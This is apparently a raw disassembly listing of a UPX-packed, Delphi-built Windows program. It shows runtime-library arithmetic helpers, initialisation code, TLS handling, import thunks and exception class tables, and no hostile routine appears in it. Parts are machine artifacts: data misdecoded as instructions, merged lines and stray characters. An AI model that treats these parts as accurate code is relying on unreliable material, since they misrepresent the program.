arg_4 = dword ptr 8
push ebp
push ebx
push esi
push edi
xor edi, edi
mov ebx, [esp+10h+arg_0]
mov ecx, [esp+10h+arg_4]
or ecx, ecx
jnz short loc_405257
or edx, edx
jz short loc_4052B0
or ebx, ebx
jz short loc_4052B0
loc_405257: ; CODE XREF: sub_40523D+10�j
or edx, edx
jns short loc_405265
neg edx
neg eax
sbb edx, 0
or edi, 1
loc_405265: ; CODE XREF: sub_40523D+1C�j
or ecx, ecx
jns short loc_405270
neg ecx
neg ebx
sbb ecx, 0
loc_405270: ; CODE XREF: sub_40523D+2A�j
mov ebp, ecx
mov ecx, 40h
push edi
xor edi, edi
xor esi, esi
loc_40527C: ; CODE XREF: sub_40523D:loc_405293�j
shl eax, 1
rcl edx, 1
rcl esi, 1
rcl edi, 1
cmp edi, ebp
jb short loc_405293
ja short loc_40528E
cmp esi, ebx
jb short loc_405293
loc_40528E: ; CODE XREF: sub_40523D+4B�j
sub esi, ebx
sbb edi, ebp
inc eax
loc_405293: ; CODE XREF: sub_40523D+49�j
; sub_40523D+4F�j
loop loc_40527C
mov eax, esi
mov edx, edi
pop ebx
test ebx, 1
jz short loc_4052A9
neg edx
neg eax
sbb edx, 0
loc_4052A9: ; CODE XREF: sub_40523D+63�j
; sub_40523D+78�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_4052B0: ; CODE XREF: sub_40523D+14�j
; sub_40523D+18�j
div ebx
xchg eax, edx
xor edx, edx
jmp short loc_4052A9
sub_40523D endp
; ---------------------------------------------------------------------------
push esi
mov esi, [esp+0Ch]
and esi, [esp+8]
cmp esi, 0FFFFFFFFh
jnz short loc_4052D6
mov esi, eax
or esi, edx
cmp esi, 80000000h
jnz short loc_4052D6
mov eax, esi
pop esi
dec eax
retn
; ---------------------------------------------------------------------------
loc_4052D6: ; CODE XREF: UPX0:004052C3�j
; UPX0:004052CF�j
pop esi
push dword ptr [esp+8]
push dword ptr [esp+8]
call sub_40523D
and eax, eax
retn 8
; =============== S U B R O U T I N E =======================================
sub_4052E9 proc near ; CODE XREF: sub_406B87+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
push ebx
push esi
push edi
mov ebx, [esp+10h+arg_0]
mov ecx, [esp+10h+arg_4]
or ecx, ecx
jnz short loc_405301
or edx, edx
jz short loc_405330
or ebx, ebx
jz short loc_405330
loc_405301: ; CODE XREF: sub_4052E9+E�j
mov ebp, ecx
mov ecx, 40h
xor edi, edi
xor esi, esi
loc_40530C: ; CODE XREF: sub_4052E9:loc_405323�j
shl eax, 1
rcl edx, 1
rcl esi, 1
rcl edi, 1
cmp edi, ebp
jb short loc_405323
ja short loc_40531E
cmp esi, ebx
jb short loc_405323
loc_40531E: ; CODE XREF: sub_4052E9+2F�j
sub esi, ebx
sbb edi, ebp
inc eax
loc_405323: ; CODE XREF: sub_4052E9+2D�j
; sub_4052E9+33�j
loop loc_40530C
mov eax, esi
mov edx, edi
loc_405329: ; CODE XREF: sub_4052E9+4C�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_405330: ; CODE XREF: sub_4052E9+12�j
; sub_4052E9+16�j
div ebx
xchg eax, edx
xor edx, edx
jmp short loc_405329
sub_4052E9 endp
; ---------------------------------------------------------------------------
cmp cl, 20h
jl short loc_40534D
cmp cl, 40h
jl short loc_405346
xor edx, edx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405346: ; CODE XREF: UPX0:0040533F�j
mov edx, eax
shl edx, cl
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40534D: ; CODE XREF: UPX0:0040533A�j
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
cmp cl, 20h
jl short loc_405369
cmp cl, 40h
jl short loc_405363
sar edx, 1Fh
mov eax, edx
retn
; ---------------------------------------------------------------------------
loc_405363: ; CODE XREF: UPX0:0040535B�j
mov eax, edx
cdq
sar eax, cl
retn
; ---------------------------------------------------------------------------
loc_405369: ; CODE XREF: UPX0:00405356�j
shrd eax, edx, cl
sar edx, cl
retn
; ---------------------------------------------------------------------------
cmp cl, 20h
jl short loc_405385
cmp cl, 40h
jl short loc_40537E
xor edx, edx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40537E: ; CODE XREF: UPX0:00405377�j
mov eax, edx
xor edx, edx
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_405385: ; CODE XREF: UPX0:00405372�j
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4053EA
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C42C
jnz short loc_4053DC
mov eax, offset dword_40C050
call sub_404AC4
mov eax, offset dword_40C21C
call sub_404AC4
call sub_401984
mov eax, offset word_40C414
call sub_404054
mov eax, offset word_40C404
call sub_404054
mov eax, offset word_40C3F4
call sub_404054
loc_4053DC: ; CODE XREF: UPX0:004053A3�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4053F1
loc_4053E9: ; CODE XREF: UPX0:004053EF�j
retn
; ---------------------------------------------------------------------------
loc_4053EA: ; DATA XREF: UPX0:00405392�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4053E9
; ---------------------------------------------------------------------------
loc_4053F1: ; CODE XREF: UPX0:loc_4053E9�j
; DATA XREF: UPX0:004053E4�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4054DC
push dword ptr fs:[eax]
mov fs:[eax], esp
sub dword_40C42C, 1
jnb loc_4054CE
xor eax, eax
mov dword_40C038, eax
xor eax, eax
mov dword_40C040, eax
xor eax, eax
mov dword_40C044, eax
mov byte_40C04A, 2
mov byte_40C04B, 2
mov byte_40C04C, 3
mov word_40C3F4, 0
mov word_40C404, 1
mov word_40C414, 0Ah
mov dword_40C41C, 80020004h
mov off_40C3E8, offset sub_403CC4
mov off_40C3EC, offset sub_403CBC
mov off_40C3F0, offset sub_403CC4
call sub_402794
test al, al
jz short loc_40548D
call sub_4027C4
loc_40548D: ; CODE XREF: UPX0:00405486�j
call sub_402888
mov eax, offset dword_40C050
mov edx, offset dword_4054E8
call sub_404A22
mov eax, offset dword_40C21C
mov edx, offset dword_4054E8
call sub_404A22
call sub_401100 ; GetCommandLineA
mov dword_40C030, eax
call sub_4011D0
mov dword_40C02C, eax
call sub_404818 ; GetCurrentThreadId
mov dword_40C024, eax
loc_4054CE: ; CODE XREF: UPX0:0040540C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4054E3
loc_4054DB: ; CODE XREF: UPX0:004054E1�j
retn
; ---------------------------------------------------------------------------
loc_4054DC: ; DATA XREF: UPX0:004053FA�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4054DB
; ---------------------------------------------------------------------------
loc_4054E3: ; CODE XREF: UPX0:loc_4054DB�j
; DATA XREF: UPX0:004054D6�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
dword_4054E8 dd 0 ; UPX0:004054A6�o
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4054EC proc near ; CODE XREF: sub_4055A8+17�p
jmp ds:dword_40D1E8
sub_4054EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4054F4 proc near ; CODE XREF: sub_4055F4+3�p
jmp ds:dword_40D1E4
sub_4054F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4054FC proc near ; CODE XREF: sub_405514+24�p
jmp ds:dword_40D1E0
sub_4054FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405504 proc near ; CODE XREF: sub_405564+27�p
; sub_405564+39�p
jmp ds:dword_40D1DC
sub_405504 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40550C proc near ; CODE XREF: sub_405514+42�p
jmp ds:dword_40D1D8
sub_40550C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_405514 proc near ; CODE XREF: sub_405564:loc_40557F�p
push ebx
mov eax, 8
test eax, eax
jz short loc_405561
cmp TlsIndex, 0
jge short loc_405531
mov eax, 0E2h
call sub_4031BC
; ---------------------------------------------------------------------------
loc_405531: ; CODE XREF: sub_405514+11�j
push 8
push 40h
call sub_4054FC ; LocalAlloc
mov ebx, eax
test ebx, ebx
jnz short loc_40554F
mov eax, 0E2h
call sub_4031BC
; ---------------------------------------------------------------------------
jmp short loc_40555B
; ---------------------------------------------------------------------------
loc_40554F: ; CODE XREF: sub_405514+2D�j
push ebx
mov eax, TlsIndex
push eax
call sub_40550C ; TlsSetValue
loc_40555B: ; CODE XREF: sub_405514+39�j
mov dword_40C4E4, ebx
loc_405561: ; CODE XREF: sub_405514+8�j
pop ebx
retn
sub_405514 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_405564 proc near ; CODE XREF: sub_4025D4+19�p
; sub_402618+3�p ...
mov cl, byte_40C4D0
mov eax, TlsIndex
test cl, cl
jnz short loc_40559C
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_40557F: ; CODE XREF: sub_405564+40�j
call sub_405514
mov eax, TlsIndex
push eax
call sub_405504 ; TlsGetValue
test eax, eax
jz short loc_405595
retn
; ---------------------------------------------------------------------------
loc_405595: ; CODE XREF: sub_405564+2E�j
mov eax, dword_40C4E4
retn
; ---------------------------------------------------------------------------
loc_40559C: ; CODE XREF: sub_405564+E�j
push eax
call sub_405504 ; TlsGetValue
test eax, eax
jz short loc_40557F
retn
sub_405564 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4055A8 proc near ; CODE XREF: sub_4055F4+25�p
var_10C = byte ptr -10Ch
push ebx
add esp, 0FFFFFEF8h
push 105h
lea eax, [esp+110h+var_10C]
push eax
mov eax, dword_40C4DC
push eax
call sub_4054EC ; GetModuleFileNameA
mov eax, esp
call sub_4044B4
mov ebx, eax
mov dword_40B0B8, ebx
test ebx, ebx
jnz short loc_4055E1
mov eax, dword_40B0AC
mov dword_40B0B8, eax
loc_4055E1: ; CODE XREF: sub_4055A8+2D�j
mov eax, 40B0A8h
call sub_40470C
add esp, 108h
pop ebx
retn
sub_4055A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4055F4 proc near ; CODE XREF: sub_40AF30+11�p
push eax
push 0
call sub_4054F4 ; GetModuleHandleA
mov edx, 40B0A8h
push edx
mov dword_40C4DC, eax
mov [edx+4], eax
mov dword ptr [edx+8], 0
mov dword ptr [edx+0Ch], 0
call sub_4055A8
pop edx
pop eax
call sub_402FA0
retn
sub_4055F4 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40564D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C4E0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_405654
loc_40564C: ; CODE XREF: UPX0:00405652�j
retn
; ---------------------------------------------------------------------------
loc_40564D: ; DATA XREF: UPX0:0040562E�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40564C
; ---------------------------------------------------------------------------
loc_405654: ; CODE XREF: UPX0:loc_40564C�j
; DATA XREF: UPX0:00405647�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C4E0, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405660 proc near ; CODE XREF: sub_40ADDC+5C�p
jmp ds:dword_40D1FC
sub_405660 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405668 proc near ; CODE XREF: sub_40ADDC+15�p
jmp ds:dword_40D1F8
sub_405668 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405670 proc near ; CODE XREF: sub_40ADDC+30�p
jmp ds:dword_40D1F4
sub_405670 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405678 proc near ; CODE XREF: sub_40ADDC+53�p
jmp ds:dword_40D1F0
sub_405678 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405680 proc near ; CODE XREF: sub_40A848+310�p
jmp ds:dword_40D268
sub_405680 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405688 proc near ; CODE XREF: sub_40A848+30A�p
jmp ds:dword_40D264
sub_405688 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405690 proc near ; CODE XREF: sub_40663C+B�p
jmp ds:dword_40D260
sub_405690 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405698 proc near ; CODE XREF: sub_407428+53�p
; sub_407428+7C�p
jmp ds:dword_40D25C
sub_405698 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056A0 proc near ; CODE XREF: sub_406548+3C�p
jmp ds:dword_40D258
sub_4056A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056A8 proc near ; CODE XREF: sub_406548+2D�p
jmp ds:dword_40D254
sub_4056A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056B0 proc near ; CODE XREF: sub_406620+C�p
jmp ds:dword_40D250
sub_4056B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056B8 proc near ; CODE XREF: sub_4065AC+1B�p
jmp ds:dword_40D24C
sub_4056B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056C0 proc near ; CODE XREF: sub_406548+10�p
; sub_4065FC+B�p
jmp ds:dword_40D248
sub_4056C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056C8 proc near ; CODE XREF: sub_407154+1F�p
jmp ds:dword_40D244
sub_4056C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056D0 proc near ; CODE XREF: sub_408328+71�p
jmp ds:dword_40D240
sub_4056D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056D8 proc near ; CODE XREF: sub_406754+21�p
jmp ds:dword_40D23C
sub_4056D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056E0 proc near ; CODE XREF: sub_40AF30+5C�p
jmp ds:dword_40D238
sub_4056E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056E8 proc near ; CODE XREF: sub_406520+1B�p
; sub_406548+19�p ...
jmp ds:dword_40D234
sub_4056E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056F0 proc near ; CODE XREF: sub_407104+8�p
jmp ds:dword_40D230
sub_4056F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4056F8 proc near ; CODE XREF: sub_4071A0+1E�p
; sub_4071EC+13�p
jmp ds:dword_40D22C
sub_4056F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405700 proc near ; CODE XREF: sub_407704+41�p
; sub_407704+5C�p ...
jmp ds:dword_40D228
sub_405700 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405708 proc near ; CODE XREF: sub_408778+6�p
; sub_4099A4+6�p
jmp ds:dword_40D224
sub_405708 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405710 proc near ; CODE XREF: sub_408778+17�p
; sub_4099A4+17�p ...
jmp ds:dword_40D220
sub_405710 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405718 proc near ; CODE XREF: sub_407250+1C�p
; sub_407428+18�p ...
jmp ds:dword_40D21C
sub_405718 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405720 proc near ; CODE XREF: sub_408140+E�p
jmp ds:dword_40D218
sub_405720 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405728 proc near ; CODE XREF: sub_40A5A0+1CC�p
jmp ds:dword_40D214
sub_405728 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405730 proc near ; CODE XREF: sub_409ED8+3B�p
; sub_409ED8+80�p
jmp ds:dword_40D210
sub_405730 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405738 proc near ; CODE XREF: sub_406520+12�p
jmp ds:dword_40D20C
sub_405738 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405740 proc near ; CODE XREF: sub_40A848+5B�p
; sub_40A848+257�p ...
jmp ds:dword_40D208
sub_405740 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405748 proc near ; CODE XREF: sub_407704+1D�p
; sub_407D60+6B�p
jmp ds:dword_40D204
sub_405748 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405750 proc near ; CODE XREF: sub_40AC70+131�p
jmp ds:dword_40D278
sub_405750 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405758 proc near ; CODE XREF: sub_40AC70+81�p
jmp ds:dword_40D274
sub_405758 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405760 proc near ; CODE XREF: sub_40AC70+45�p
jmp ds:dword_40D270
sub_405760 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405768 proc near ; CODE XREF: sub_408328+4E�p
; sub_408328+5D�p
jmp ds:dword_40D288
sub_405768 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405770 proc near ; CODE XREF: sub_407704+F2�p
; sub_40788C+53�p
jmp ds:dword_40D284
sub_405770 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405778 proc near ; CODE XREF: sub_40788C+69�p
jmp ds:dword_40D280
sub_405778 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4057A5
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C4E8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4057AC
loc_4057A4: ; CODE XREF: UPX0:004057AA�j
retn
; ---------------------------------------------------------------------------
loc_4057A5: ; DATA XREF: UPX0:00405786�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4057A4
; ---------------------------------------------------------------------------
loc_4057AC: ; CODE XREF: UPX0:loc_4057A4�j
; DATA XREF: UPX0:0040579F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub dword_40C4E8, 1
retn
; ---------------------------------------------------------------------------
off_4057B8 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B3C0�o
dd 0FFF0h
off_4057C0 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B410�o
dd 0FFF1h
off_4057C8 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B35C�o
dd 0FFF2h
off_4057D0 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B354�o
dword_4057D4 dd 0FFF3h, 40C4DCh, 0FFF4h, 40C4DCh, 0FFF5h, 40C4DCh, 0FFF6h
; DATA XREF: UPX0:0040B3A0�o
; UPX0:0040B45C�o
dd 40C4DCh, 0FFF7h, 40C4DCh, 0FFF8h, 40C4DCh, 0FFF9h, 40C4DCh
dd 0FFFAh, 40C4DCh, 0FFFBh, 40C4DCh, 0FFFCh, 40C4DCh, 0FFFDh
dd 40C4DCh, 0FFFEh, 40C4DCh, 0FFFFh, 40C4DCh, 0FFE0h, 40C4DCh
dd 0FFE1h
off_405848 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B3EC�o
dword_40584C dd 0FFE2h, 40C4DCh, 0FFE3hoff_405858 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B458�o
dword_40585C dd 0FFE4h, 40C4DCh, 0FFE5h, 40C4DCh, 0FFE6h, 40C4DCh, 0FFE7h
; DATA XREF: UPX0:0040B394�o
; UPX0:0040B398�o
off_405878 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B478�o
dd 0FFE8h
off_405880 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B358�o
dd 0FFE9h
off_405888 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B130�o
; UPX0:off_40B368�o
dword_40588C dd 0FFEAh, 40C4DCh, 0FFEBh, 40C4DCh, 0FFECh, 40C4DCh, 0FFEDh
; DATA XREF: UPX0:off_40B134�o
; UPX0:off_40B3A8�o ...
dd 40C4DCh, 0FFEEh
off_4058B0 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B484�o
dd 0FFEFh
off_4058B8 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B404�o
dword_4058BC dd 0FFD0h, 40C4DCh, 0FFD1h, 40C4DCh, 0FFD2h, 40C4DCh, 0FFD3h
; DATA XREF: UPX0:0040B3AC�o
; UPX0:0040B37C�o
off_4058D8 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B31C�o
dd 0FFD4h
off_4058E0 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B418�o
dword_4058E4 dd 0FFD5h, 40C4DCh, 0FFD6h, 40C4DCh, 0FFD7h ; UPX0:0040B400�o
off_4058F8 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B444�o
dd 0FFD8h
off_405900 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B36C�o
dd 0FFD9h
off_405908 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B438�o
dd 0FFDAh
off_405910 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B138�o
; UPX0:off_40B474�o
dword_405914 dd 0FFDBh, 40C4DCh, 0FFDCh, 40C4DCh, 0FFDDh, 40C4DCh, 0FFDEh
; DATA XREF: UPX0:off_40B13C�o
; UPX0:off_40B3D4�o ...
dd 40C4DCh, 0FFDFh, 40C4DCh, 0FFC0h, 40C4DCh, 0FFC1h, 40C4DCh
dd 0FFC2h, 40C4DCh, 0FFC3h, 40C4DCh, 0FFC4h, 40C4DCh, 0FFC5h
dd 40C4DCh, 0FFC6h
off_405970 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B168�o
; UPX0:off_40B3B0�o
; ---------------------------------------------------------------------------
loc_405974: ; DATA XREF: UPX0:off_40B16C�o
; UPX0:off_40B304�o
mov edi, 0C4DC0000h
inc eax
add al, cl
inc dword ptr [eax]
loc_40597F: ; DATA XREF: UPX0:off_40B170�o
; UPX0:off_40B384�o
add ah, bl
les eax, [eax+0]
leave
inc dword ptr [eax]
loc_405987: ; DATA XREF: UPX0:off_40B174�o
; UPX0:off_40B3C8�o
add ah, bl
les eax, [eax+0]
retf 0FFh
; ---------------------------------------------------------------------------
align 10h
off_405990 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B178�o
; UPX0:off_40B3E8�o
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 0FFh, 2 dup(0)
off_405998 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B17C�o
; UPX0:off_40B3B8�o
db 0CCh
db 0FFh, 2 dup(0)
off_4059A0 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B180�o
; UPX0:off_40B370�o
dword_4059A4 dd 0FFCDh, 40C4DCh, 0FFCEh, 40C4DCh, 0FFCFh, 40C4DCh, 0FFB0h
; DATA XREF: UPX0:off_40B184�o
; UPX0:off_40B3CC�o ...
dd 40C4DCh, 0FFB1h, 40C4DCh, 0FFB2h
off_4059D0 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B198�o
; UPX0:off_40B3F8�o
dword_4059D4 dd 0FFB3h, 40C4DCh, 0FFB4h, 40C4DCh, 0FFB5h, 40C4DCh, 0FFB6h
; DATA XREF: UPX0:off_40B19C�o
; UPX0:off_40B420�o ...
dd 40C4DCh, 0FFB7h, 40C4DCh, 0FFB8h, 40C4DCh, 0FFB9h
off_405A08 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B1B4�o
; UPX0:off_40B328�o
dword_405A0C dd 0FFBAh, 40C4DCh, 0FFBBh, 40C4DCh, 0FFBCh, 40C4DCh, 0FFBDh
; DATA XREF: UPX0:off_40B1B8�o
; UPX0:off_40B340�o ...
dd 40C4DCh, 0FFBEh, 40C4DCh, 0FFBFh, 40C4DCh, 0FFA0h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_405A65
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C4EC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_405A6C
loc_405A64: ; CODE XREF: UPX0:00405A6A�j
retn
; ---------------------------------------------------------------------------
loc_405A65: ; DATA XREF: UPX0:00405A46�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_405A64
; ---------------------------------------------------------------------------
loc_405A6C: ; CODE XREF: UPX0:loc_405A64�j
; DATA XREF: UPX0:00405A5F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub dword_40C4EC, 1
retn
; ---------------------------------------------------------------------------
dd offset dword_405A7C
dword_405A7C dd 4654090Ah, 4E656C69h, 90656D61hoff_405A88 dd offset dword_405A8C ; DATA XREF: sub_40A848+40�r
; sub_40A848+3D2�r
dword_405A8C dd 53540A0Eh, 63726165h, 63655268h, 158h, 1, 405A78h, 0Ch
; DATA XREF: UPX0:off_405A88�o
off_405AA8 dd offset dword_405AF4 ; DATA XREF: sub_407704+A2�r
; sub_408008+72�r
dd 2 dup(0)
dd offset dword_405AF4
dd 4 dup(0)
dd offset word_405B06
dd 0Ch, 40101Ch, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_405AF4 dd 0Eh, 10000h, 10000000h, 40040h ; UPX0:00405AB4�o ...
db 2 dup(0)
word_405B06 dw 4509h ; DATA XREF: UPX0:00405AC8�o
dd 70656378h, 6E6F6974h, 405B5Ch, 7 dup(0)
dd offset dword_405B5C
dd 10h, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 407AD8h, 4028E4h
dword_405B5C dd 6548450Eh, 78457061h, 74706563h, 906E6F69hoff_405B6C dd offset dword_405BB8 ; DATA XREF: sub_408008+27�r
dd 7 dup(0)
dd offset dword_405BB8
dd 10h, 405B10h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 407AD8h, 4028E4h
dword_405BB8 dd 754F450Ch, 4D664F74h, 726F6D65h, 408D79h ; UPX0:00405B8C�o
off_405BC8 dd offset dword_405C14 ; DATA XREF: sub_407B04+2D�r
; sub_407B04+4C�r
dd 7 dup(0)
dd offset dword_405C14
dd 10h, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_405C14 dd 6E49450Bh, 4574754Fh, 726F7272h ; UPX0:00405BE8�o
off_405C20 dd offset dword_405C6C ; DATA XREF: sub_407F2C+90�r
dd 7 dup(0)
dd offset dword_405C6C
dd 10h, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_405C6C dd 78454509h, 6E726574h, 0C08B6C61h ; UPX0:00405C40�o
off_405C78 dd offset dword_405CC4 ; DATA XREF: sub_407F2C+82�r
dd 7 dup(0)
dd offset dword_405CC4
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_405CC4 dd 78454512h, 6E726574h, 78456C61h, 74706563h, 906E6F69h
; DATA XREF: UPX0:off_405C78�o
; UPX0:00405C98�o
dd 405D24h, 7 dup(0)
dd offset aEinterrorl@ ; "\tEIntError|]@"
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEinterrorl@ db 9,'EIntError|]@',0 ; DATA XREF: UPX0:00405CF8�o
dd 7 dup(0)
dd offset aEdivbyzeror@ ; "\nEDivByZero]@"
